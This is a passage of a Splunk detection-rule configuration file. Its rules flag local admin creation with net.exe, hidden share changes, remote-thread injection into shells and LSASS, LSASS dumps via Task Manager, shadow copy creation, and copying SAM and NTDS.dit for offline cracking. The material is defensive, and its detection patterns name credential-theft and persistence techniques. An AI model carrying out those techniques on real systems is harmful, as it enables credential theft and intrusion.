action.escu.analytic_story = ["DHS Report TA18-074A", "Azorult", "CISA AA22-257A", "DarkGate Malware"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to add a user to the local Administrators group.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Create local admin accounts using net exe - Rule
action.correlationsearch.annotations = {"analytic_story": ["DHS Report TA18-074A", "Azorult", "CISA AA22-257A", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects the creation of local administrator accounts using the net.exe command to mitigate the risks associated with unauthorized access and prevent further damage to the environment by responding to potential threats earlier and taking appropriate actions to protect the organization's systems and data. This detection is made by a Splunk query to search for processes with the name net.exe or net1.exe that include the "/add" parameter and have specific keywords related to administrator accounts in their process name. This detection is important because the creation of unauthorized local administrator accounts might indicate that an attacker has successfully created a new administrator account and is trying to gain persistent access to a system or escalate their privileges for data theft, or other malicious activities.
False positives might occur since there might be legitimate uses of the net.exe command and the creation of administrator accounts in certain circumstances. You must consider the context of the activity and other indicators of compromise before taking any action. For next steps, review the details of the identified process, including the user, parent process, and parent process name. Examine any relevant on-disk artifacts and look for concurrent processes to determine the source of the attack.
action.notable.param.rule_title = Create local admin accounts using net exe
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process values(parent_process_name) as parent_process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=net.exe OR Processes.process_name=net1.exe) AND Processes.process=*/add* AND (Processes.process=*administrators* OR Processes.process=*administratoren* OR Processes.process=*administrateurs* OR Processes.process=*administrador* OR Processes.process=*amministratori* OR Processes.process=*administratorer*) by Processes.process Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `create_local_admin_accounts_using_net_exe_filter`

[ESCU - Create or delete windows shares using net exe - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the creation or deletion of hidden shares using the net.exe command for prompt response and mitigation to enhance the overall security
posture of the organization and protect against potential data breaches, malware infections, and other damaging outcomes. This detection is made by searching for processes that involve the use of net.exe and filters for actions related to creation or deletion of shares. This detection is important because it suggests that an attacker is attempting to manipulate or exploit the network by creating or deleting hidden shares. The creation or deletion of hidden shares can indicate malicious activity since attackers might use hidden shares to exfiltrate data, distribute malware, or establish persistence within a network. The impact of such an attack can vary, but it often involves unauthorized access to sensitive information, disruption of services, or the introduction of malware. False positives might occur since legitimate actions can also involve the use of net.exe. An extensive triage and investigation is necessary to determine the intent and nature of the detected activity. Next steps include reviewing the details of the process involving the net.exe command, including the user, parent process, and timestamps during the triage. Additionally, capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the source of the attack.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.005"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects the creation or deletion of hidden shares using the net.exe command for prompt response and mitigation to enhance the overall security posture of the organization and protect against potential data breaches, malware infections, and other damaging outcomes. This detection is made by searching for processes that involve the use of net.exe and filters for actions related to creation or deletion of shares.
This detection is important because it suggests that an attacker is attempting to manipulate or exploit the network by creating or deleting hidden shares. The creation or deletion of hidden shares can indicate malicious activity since attackers might use hidden shares to exfiltrate data, distribute malware, or establish persistence within a network. The impact of such an attack can vary, but it often involves unauthorized access to sensitive information, disruption of services, or the introduction of malware. False positives might occur since legitimate actions can also involve the use of net.exe. An extensive triage and investigation is necessary to determine the intent and nature of the detected activity. Next steps include reviewing the details of the process involving the net.exe command, including the user, parent process, and timestamps during the triage. Additionally, capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the source of the attack.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators often leverage net.exe to create or delete network shares. You should verify that the activity was intentional and is legitimate.
action.escu.creation_date = 2020-09-16
action.escu.modification_date = 2020-09-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Create or delete windows shares using net exe - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Hidden Cobra Malware", "CISA AA22-277A", "Windows Post-Exploitation", "Prestige Ransomware", "DarkGate Malware"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ enumerating Windows file shares.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Create or delete windows shares using net exe - Rule
action.correlationsearch.annotations = {"analytic_story": ["Hidden Cobra Malware", "CISA AA22-277A", "Windows Post-Exploitation", "Prestige Ransomware", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects the creation or deletion of hidden shares using the net.exe
command for prompt response and mitigation to enhance the overall security posture of the organization and protect against potential data breaches, malware infections, and other damaging outcomes. This detection is made by searching for processes that involve the use of net.exe and filters for actions related to creation or deletion of shares. This detection is important because it suggests that an attacker is attempting to manipulate or exploit the network by creating or deleting hidden shares. The creation or deletion of hidden shares can indicate malicious activity since attackers might use hidden shares to exfiltrate data, distribute malware, or establish persistence within a network. The impact of such an attack can vary, but it often involves unauthorized access to sensitive information, disruption of services, or the introduction of malware. False positives might occur since legitimate actions can also involve the use of net.exe. An extensive triage and investigation is necessary to determine the intent and nature of the detected activity. Next steps include reviewing the details of the process involving the net.exe command, including the user, parent process, and timestamps during the triage. Additionally, capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the source of the attack. 
action.notable.param.rule_title = Create or delete windows shares using net exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` by Processes.process Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | search process=*share* | `create_or_delete_windows_shares_using_net_exe_filter` [ESCU - Create Remote Thread In Shell Application - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect suspicious process injection in command shell. This technique was seen in IcedID where it execute cmd.exe process to inject its shellcode as part of its execution as banking trojan. It is really uncommon to have a create remote thread execution in the following application. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect suspicious process injection in command shell. This technique was seen in IcedID where it execute cmd.exe process to inject its shellcode as part of its execution as banking trojan. It is really uncommon to have a create remote thread execution in the following application. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. 
If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2024-01-31 action.escu.modification_date = 2024-01-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Create Remote Thread In Shell Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID", "Qakbot", "Warzone RAT"] action.risk = 1 action.risk.param._risk_message = process $process_name$ create a remote thread to shell app process $TargetImage$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Create Remote Thread In Shell Application - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Qakbot", "Warzone RAT"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect suspicious process injection in command shell. This technique was seen in IcedID where it execute cmd.exe process to inject its shellcode as part of its execution as banking trojan. It is really uncommon to have a create remote thread execution in the following application. 
action.notable.param.rule_title = Create Remote Thread In Shell Application action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=8 TargetImage IN ("*\\cmd.exe", "*\\powershell*") | stats count min(_time) as firstTime max(_time) as lastTime by TargetImage TargetProcessId SourceProcessId EventCode StartAddress SourceImage dest |rename SourceImage as process_name| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `create_remote_thread_in_shell_application_filter` [ESCU - Create Remote Thread into LSASS - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of a remote thread in the Local Security Authority Subsystem Service (LSASS), which is a common tactic used by adversaries to steal user authentication credentials, known as credential dumping. The detection is made by leveraging Sysmon Event ID 8 logs and searches for processes that create remote threads in lsass.exe. This is an unusual activity that is generally linked to credential theft or credential dumping, which is a significant threat to network security. The detection is important because it helps to detect potential credential dumping attacks, which can result in significant damage to an organization's security. False positives might occur though the confidence level of this alert is high. There might be cases where legitimate tools can access LSASS and generate similar logs. Therefore, you must understand the broader context of such events and differentiate between legitimate activities and possible threats. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of a remote thread in the Local Security Authority Subsystem Service (LSASS), which is a common tactic used by adversaries to steal user authentication credentials, known as credential dumping. The detection is made by leveraging Sysmon Event ID 8 logs and searches for processes that create remote threads in lsass.exe. This is an unusual activity that is generally linked to credential theft or credential dumping, which is a significant threat to network security. The detection is important because it helps to detect potential credential dumping attacks, which can result in significant damage to an organization's security. False positives might occur though the confidence level of this alert is high. There might be cases where legitimate tools can access LSASS and generate similar logs. Therefore, you must understand the broader context of such events and differentiate between legitimate activities and possible threats. action.escu.how_to_implement = This search needs Sysmon Logs with a Sysmon configuration, which includes EventCode 8 with lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives. action.escu.known_false_positives = Other tools can access LSASS for legitimate reasons and generate an event. In these cases, tweaking the search may help eliminate noise. 
action.escu.creation_date = 2019-12-06 action.escu.modification_date = 2019-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Create Remote Thread into LSASS - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Credential Dumping"] action.risk = 1 action.risk.param._risk_message = A process has created a remote thread into $TargetImage$ on $dest$. This behavior is indicative of credential dumping and should be investigated. action.risk.param._risk = [{"risk_object_field": "TargetImage", "risk_object_type": "other", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Create Remote Thread into LSASS - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation of a remote thread in the Local Security Authority Subsystem Service (LSASS), which is a common tactic used by adversaries to steal user authentication credentials, known as credential dumping. The detection is made by leveraging Sysmon Event ID 8 logs and searches for processes that create remote threads in lsass.exe. This is an unusual activity that is generally linked to credential theft or credential dumping, which is a significant threat to network security. 
The detection is important because it helps to detect potential credential dumping attacks, which can result in significant damage to an organization's security. False positives might occur though the confidence level of this alert is high. There might be cases where legitimate tools can access LSASS and generate similar logs. Therefore, you must understand the broader context of such events and differentiate between legitimate activities and possible threats. action.notable.param.rule_title = Create Remote Thread into LSASS action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=8 TargetImage=*lsass.exe | stats count min(_time) as firstTime max(_time) as lastTime by dest, EventCode, TargetImage, TargetProcessId | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `create_remote_thread_into_lsass_filter` [ESCU - Creation of lsass Dump with Taskmgr - Rule] action.escu = 0 action.escu.enabled = 1 description = Detect the hands on keyboard behavior of Windows Task Manager creating a process dump of lsass.exe. Upon this behavior occurring, a file write/modification will occur in the users profile under \AppData\Local\Temp. The dump file, lsass.dmp, cannot be renamed, however if the dump occurs more than once, it will be named lsass (2).dmp. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = Detect the hands on keyboard behavior of Windows Task Manager creating a process dump of lsass.exe. Upon this behavior occurring, a file write/modification will occur in the users profile under \AppData\Local\Temp. 
The dump file, lsass.dmp, cannot be renamed, however if the dump occurs more than once, it will be named lsass (2).dmp. action.escu.how_to_implement = This search requires Sysmon Logs and a Sysmon configuration, which includes EventCode 11 for detecting file create of lsass.dmp. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives. action.escu.known_false_positives = Administrators can create memory dumps for debugging purposes, but memory dumps of the LSASS process would be unusual. action.escu.creation_date = 2020-02-03 action.escu.modification_date = 2020-02-03 action.escu.confidence = high action.escu.full_search_name = ESCU - Creation of lsass Dump with Taskmgr - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Credential Dumping", "CISA AA22-257A"] action.risk = 1 action.risk.param._risk_message = $process_name$ was identified on endpoint $dest$ writing $TargetFilename$ to disk. This behavior is related to dumping credentials via Task Manager. 
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Creation of lsass Dump with Taskmgr - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Detect the hands on keyboard behavior of Windows Task Manager creating a process dump of lsass.exe. Upon this behavior occurring, a file write/modification will occur in the users profile under \AppData\Local\Temp. The dump file, lsass.dmp, cannot be renamed, however if the dump occurs more than once, it will be named lsass (2).dmp. action.notable.param.rule_title = Creation of lsass Dump with Taskmgr action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=11 process_name=taskmgr.exe TargetFilename=*lsass*.dmp | stats count min(_time) as firstTime max(_time) as lastTime by dest, object_category, process_name, TargetFilename | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `creation_of_lsass_dump_with_taskmgr_filter` [ESCU - Creation of Shadow Copy - Rule] action.escu = 0 action.escu.enabled = 1 description = Monitor for signs that Vssadmin or Wmic has been used to create a shadow copy. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Monitor for signs that Vssadmin or Wmic has been used to create a shadow copy. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate administrator usage of Vssadmin or Wmic will create false positives. action.escu.creation_date = 2024-01-01 action.escu.modification_date = 2024-01-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Creation of Shadow Copy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "Volt Typhoon"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to create a shadow copy to perform offline password cracking. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Creation of Shadow Copy - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Volt Typhoon"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Monitor for signs that Vssadmin or Wmic has been used to create a shadow copy. action.notable.param.rule_title = Creation of Shadow Copy action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe Processes.process=*create* Processes.process=*shadow*) OR (Processes.process_name=wmic.exe Processes.process=*shadowcopy* Processes.process=*create*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `creation_of_shadow_copy_filter` [ESCU - Creation of Shadow Copy with wmic and 
powershell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the use of two specific tools, wmic and Powershell, to create a shadow copy to identify potential threats earlier and take appropriate actions to mitigate the risks. This detection is made by a Splunk query that searches for processes in the Endpoint.Processes data model where either the process name contains "wmic" or "Powershell" and the process command contains "shadowcopy" and "create". This detection is important because it suggests that an attacker is attempting to manipulate or access data in an unauthorized manner, which can lead to data theft, data manipulation, or other malicious activities. Attackers might use shadow copies to backup and exfiltrate sensitive data or to hide their tracks by restoring files to a previous state after an attack. Next steps include reviewing the user associated with the process, the process name, the original file name, the process command, and the destination of the process. Additionally, examine any relevant on-disk artifacts and review other concurrent processes to determine the source of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the use of two specific tools, wmic and Powershell, to create a shadow copy to identify potential threats earlier and take appropriate actions to mitigate the risks. This detection is made by a Splunk query that searches for processes in the Endpoint.Processes data model where either the process name contains "wmic" or "Powershell" and the process command contains "shadowcopy" and "create". 
This detection is important because it suggests that an attacker is attempting to manipulate or access data in an unauthorized manner, which can lead to data theft, data manipulation, or other malicious activities. Attackers might use shadow copies to backup and exfiltrate sensitive data or to hide their tracks by restoring files to a previous state after an attack. Next steps include reviewing the user associated with the process, the process name, the original file name, the process command, and the destination of the process. Additionally, examine any relevant on-disk artifacts and review other concurrent processes to determine the source of the attack. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legtimate administrator usage of wmic to create a shadow copy. 
action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Creation of Shadow Copy with wmic and powershell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "Living Off The Land", "Volt Typhoon"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to create a shadow copy to perform offline password cracking. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Creation of Shadow Copy with wmic and powershell - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Living Off The Land", "Volt Typhoon"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the use of two specific tools, wmic and Powershell, to create a shadow copy to identify potential threats earlier and take appropriate actions to mitigate the risks. 
This detection is made by a Splunk query that searches for processes in the Endpoint.Processes data model where either the process name contains "wmic" or "Powershell" and the process command contains "shadowcopy" and "create". This detection is important because it suggests that an attacker is attempting to manipulate or access data in an unauthorized manner, which can lead to data theft, data manipulation, or other malicious activities. Attackers might use shadow copies to backup and exfiltrate sensitive data or to hide their tracks by restoring files to a previous state after an attack. Next steps include reviewing the user associated with the process, the process name, the original file name, the process command, and the destination of the process. Additionally, examine any relevant on-disk artifacts and review other concurrent processes to determine the source of the attack. action.notable.param.rule_title = Creation of Shadow Copy with wmic and powershell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` OR `process_powershell` Processes.process=*shadowcopy* Processes.process=*create* by Processes.user Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `creation_of_shadow_copy_with_wmic_and_powershell_filter` [ESCU - Credential Dumping via Copy Command from Shadow Copy - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the use of the copy command to dump credentials from a shadow 
copy so that you can detect potential threats earlier and mitigate the risks associated with credential dumping. The detection is made by using a Splunk query to search for specific processes that indicate credential dumping activity. The query looks for processes with command lines that include references to certain files, such as "sam", "security", "system", and "ntds.dit", located in system directories like "system32" or "windows". The detection is important because it suggests that an attacker is attempting to extract credentials from a shadow copy. Credential dumping is a common technique used by attackers to obtain sensitive login information and gain unauthorized access to systems to escalate privileges, move laterally within the network, or gain unauthorized access to sensitive data. False positives might occur since legitimate processes might also reference these files. During triage, it is crucial to review the process details, including the source and the command that is run. Additionally, you must capture and analyze any relevant on-disk artifacts and investigate concurrent processes to determine the source of the attack action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the use of the copy command to dump credentials from a shadow copy so that you can detect potential threats earlier and mitigate the risks associated with credential dumping. The detection is made by using a Splunk query to search for specific processes that indicate credential dumping activity. The query looks for processes with command lines that include references to certain files, such as "sam", "security", "system", and "ntds.dit", located in system directories like "system32" or "windows". 
The detection is important because it suggests that an attacker is attempting to extract credentials from a shadow copy. Credential dumping is a common technique used by attackers to obtain sensitive login information and gain unauthorized access to systems to escalate privileges, move laterally within the network, or gain unauthorized access to sensitive data. False positives might occur since legitimate processes might also reference these files. During triage, it is crucial to review the process details, including the source and the command that is run. Additionally, you must capture and analyze any relevant on-disk artifacts and investigate concurrent processes to determine the source of the attack.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-09-16
action.escu.modification_date = 2021-09-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Credential Dumping via Copy Command from Shadow Copy - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Credential Dumping"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to copy SAM and NTDS.dit for offline password cracking.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Credential Dumping via Copy Command from Shadow Copy - Rule
